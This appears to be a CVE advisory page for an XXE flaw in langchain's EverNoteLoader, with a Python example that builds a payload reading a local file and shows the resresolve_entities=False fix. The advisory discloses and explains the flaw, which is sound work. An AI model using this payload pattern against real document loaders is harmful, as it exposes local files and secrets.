CVE-2025-6984 HIGH

CVE-2025-6984: Sensitive Information Disclosure Due to Insecure XML Parsing in langchain-ai/langchain

Vendor Langchain-Ai
Product langchain-ai/langchain
Weakness CWE-200 · Info exposure
Published September 4, 2025
Last update September 4, 2025

CVSS base score

7.5/10
Attack vector Network
Attack complexity Low
Privileges required None
User interaction None
Scope Unchanged
Confidentiality High
Integrity None
Availability None

CVSS vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

What the vulnerability does

Description

The EverNoteLoader component of langchain-ai/langchain, in version 0.3.63, is vulnerable to XML External Entity (XXE) injection because it parses Evernote export files with lxml's etree.iterparse() without disabling external entity resolution. An attacker who can supply the export file that the loader ingests can declare an external entity in the document's DTD that references a local file; the parser resolves that entity, and the file's contents are returned as note content, disclosing sensitive data such as /etc/passwd to whoever reads the loaded documents.
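
As an added worked example (not code from the langchain project or from this advisory), the script below reproduces the parsing pattern described above against a constructed ENEX-shaped file whose <content> element is an external entity pointing at a local file, and then runs the same parse with resolve_entities=False. It assumes lxml is installed (the loader depends on it), a POSIX filesystem for the file:// URL, and helper names of my own (build_xxe_enex, note_contents, declares_entities, demo) that do not exist in langchain.

```python
"""Added example, not langchain's code: reproduce the EverNoteLoader XXE
pattern against lxml.etree.iterparse and show the hardened call."""
import os
import re
import tempfile

# Cheap pre-parse check. A genuine Evernote export carries a DOCTYPE that
# points at Evernote's external DTD but never declares entities of its own,
# so any <!ENTITY ...> declaration inside the document is suspicious.
_ENTITY_DECL = re.compile(rb"<!ENTITY\b")


def declares_entities(xml_bytes: bytes) -> bool:
    """Return True if the document carries its own <!ENTITY> declarations."""
    return _ENTITY_DECL.search(xml_bytes) is not None


def build_xxe_enex(target_path: str) -> bytes:
    """Constructed payload: an ENEX-shaped document whose <content> is an
    external entity that reads a local file (absolute POSIX path assumed)."""
    return (
        b'<?xml version="1.0" encoding="UTF-8"?>\n'
        b'<!DOCTYPE en-export [<!ENTITY xxe SYSTEM "file://'
        + target_path.encode() + b'">]>\n'
        b'<en-export><note><title>leak</title>'
        b'<content>&xxe;</content></note></en-export>\n'
    )


# Constructed benign export: external DTD reference, no entity declarations.
BENIGN_ENEX = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<!DOCTYPE en-export SYSTEM '
    b'"http://xml.evernote.com/pub/evernote-export4.dtd">\n'
    b'<en-export><note><title>hello</title>'
    b'<content><![CDATA[<en-note>hi</en-note>]]></content></note></en-export>\n'
)


def note_contents(path: str, hardened: bool) -> list:
    """Stream <content> elements the way a loader would, via lxml iterparse.

    hardened=False keeps lxml's default (resolve_entities=True), which is the
    vulnerable pattern; hardened=True passes resolve_entities=False so entity
    references are left unresolved and no external file is ever read.
    lxml's default no_network=True does not help: it only blocks remote
    fetches, and a file:// entity is read from local disk.
    """
    from lxml import etree  # assumed installed, as in langchain's loader

    kwargs = {"resolve_entities": False} if hardened else {}
    texts = []
    for _event, elem in etree.iterparse(
        path, events=("end",), tag="content", **kwargs
    ):
        texts.append("".join(elem.itertext()))
        elem.clear()
    return texts


def demo() -> dict:
    """Write a secret and the payload into a temp dir; parse both ways."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.txt")
        with open(secret, "w") as f:
            f.write("SECRET-TOKEN-123")
        enex = os.path.join(tmp, "notes.enex")
        payload = build_xxe_enex(secret)
        with open(enex, "wb") as f:
            f.write(payload)
        return {
            "precheck_flags_payload": declares_entities(payload),
            "precheck_flags_benign": declares_entities(BENIGN_ENEX),
            "vulnerable": note_contents(enex, hardened=False),
            "hardened": note_contents(enex, hardened=True),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The vulnerable parse returns the secret file's contents as the note body; the hardened parse returns at most the literal, unresolved reference. The declares_entities() pre-check is coarse defense in depth (it would also reject a document that defines harmless internal entities), and the parser option is the actual fix: it has to be applied wherever the loader constructs the parser, not only in one code path.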

Key dates

Disclosure timeline

September 4, 2025 CVE published
September 4, 2025 Record updated